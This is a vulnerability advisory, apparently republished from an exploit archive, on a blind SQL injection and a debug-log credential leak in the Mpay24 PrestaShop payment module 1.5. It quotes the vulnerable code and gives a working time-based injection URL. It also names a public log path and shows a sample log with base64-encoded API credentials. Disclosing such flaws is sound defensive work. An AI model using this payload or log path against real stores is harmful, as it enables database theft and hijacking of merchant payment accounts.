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Mpay24 Payment Module 1.5 Information Disclosure / SQL Injection Mpay24 Payment Module 1.5 Informat
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Mpay24 PrestaShop Payment Module Multiple Vulnerabilities - · Affected Vendor: Mpay24 - · Affected Software: Mpay24 Payment Module - · Affected Version: 1.5 and earlier - · Issue Type: SQL injection and information disclosure - · Notification Date: 10 February 2014 - · Release Date: 03 September 2014 - · Discovered by: Eldar Marcussen - · Issue status: Patch available Summary BAE Systems Applied Intelligence researcher, Eldar Marcussen has identified two high impact vulnerabilities in the Mpay24 payment module for the Prestashop e-commerce solution. “Mpay24 is the online-payment platform for e- and m-commerce combines frequently used and innovative payment systems in one single interface”. [ www.mpay24.com] “Prestashop is the free ecommerce solution to start your online business and start selling online. Build an online store for free with Prestashop.” [ www.prestashop.com] Pre-Authentication Blind SQL Injection Requires Mpay24 payment module present on the website. CVE identifier CVE-2014-2008 Description The Mpay24 plugin version 1.5 and earlier does not sufficiently filter or escape user supplied data used in database queries resulting in SQL injection vulnerabilities. The following blind SQL injection vulnerability is caused by user supplied data being used directly in a database query, as evidenced by the offending code: confirm.php:12: Db::getInstance()->Execute(" confirm.php:13: UPDATE `"._DB_PREFIX_."mpay24_order` SET confirm.php:14: `MPAYTID` = ".$_REQUEST['MPAYTID'].", confirm.php:15: `STATUS` = '".$_REQUEST['STATUS']."' confirm.php:16: WHERE `TID` = '".$_REQUEST['TID']."' confirm.php:17: "); Impact Using this vulnerability, BAE Systems was able to extract information directly from the database, bypassing any restrictions that may be enforced by the application. Proof of Concept The following URL introduces an artificial delay in the page response time which can be used by an attacker to extract data from the database: http://target/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+ Recommendation Use prepared statements to ensure the structure of the database query remains intact. Pre-Authentication Information Disclosure Requires Mpay24 configured with debug enabled (default value until version 1.6). CVE identifier CVE-2014-2009 Description The Mpay24 plugin logs raw curl requests and other debugging information to the payment gateway by default. This log file is publicly accessible and contains information valuable to an attacker, including the base64 encoded credentials used by the merchant to access the Mpay24 API. Impact Using this vulnerability, BAE Systems was able to obtain Mpay24 API credentials and the local path of the Prestashop installation. The attacker can use the API credentials to hijack the merchants API access and leverage the local path disclosure with other exploits. Proof of Concept URL: http://target/path/modulesmapy24/api/curllog.log * About to connect() to test.mpay24.com port 443 (#0) * Trying 213.164.23.169... * connected * Connected to test.mpay24.com (213.164.23.169) port 443 (#0) * successfully set certificate verify locations: * CAfile: /var/www/prestashop/modules/mpay24/api/cacert.pem CApath: /etc/ssl/certs * SSL connection using DHE-RSA-AES256-GCM-SHA384 * Server certificate: * subject: OU=Domain Control Validated; OU=Provided by EUNETIC GmbH; OU=EuropeanSSL Single; CN=test.mpay24.com * start date: 2013-05-13 00:00:00 GMT * expire date: 2015-05-13 23:59:59 GMT * subjectAltName: test.mpay24.com matched * issuer: C=DE; O=EUNETIC GmbH; CN=EuropeanSSL Server CA * SSL certificate verify ok. * Server auth using Basic with user 'u91234' > POST /app/bin/etpproxy_v15 HTTP/1.1 Authorization: Basic dTkxMjM0OlNPQVAxMjM= User-Agent: mPAY24 PHP API $Rev: 5522 $ ($Date:: 2013-06-24 #$) Host: test.mpay24.com Accept: */* Content-Length: 423 Content-Type: application/x-www-form-urlencoded * upload completely sent off: 423 out of 423 bytes * additional stuff not fine transfer.c:1037: 0 0 * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 401 Authorization Required < Date: Sun, 09 Feb 2014 21:04:21 GMT < Server: Apache * Authentication problem. Ignoring this. < WWW-Authenticate: Basic realm="mPAY24 WebService" < Content-Length: 401 < Content-Type: text/html; charset=iso-8859-1 < * Connection #0 to host test.mpay24.com left intact * Closing connection #0 Recommendation Restrict access to webpages containing sensitive functionality or data to authenticated users. End User Recommendation Update your Mpay24 plugin to version 1.6 or later. Response Timeline - 10/02/2014 – Vendor notified - 13/02/2014 – Patch available through GitHub - 19/02/2014 – CVE identifiers assigned 03/09/2014 – Advisory released # 0day.today [2024-11-15] #